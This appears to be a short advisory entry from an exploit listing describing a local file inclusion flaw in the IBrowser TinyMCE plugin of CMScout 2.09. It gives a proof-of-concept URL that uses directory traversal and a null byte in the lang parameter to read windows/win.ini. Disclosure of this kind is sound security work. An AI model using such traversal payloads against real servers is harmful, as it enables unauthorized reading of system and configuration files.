Search
Software Vulnerability Tested On Date
CMScout 2.09 / IBrowser TinyMCE Plugin Local File Inclusion Windows Vista + XAMPP 9/15/2010
Description
A vulnerability in CMScout 2.09 / IBrowser TinyMCE Plugin can be exploited to include arbitrary files.
Proof of Concept
http://localhost/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00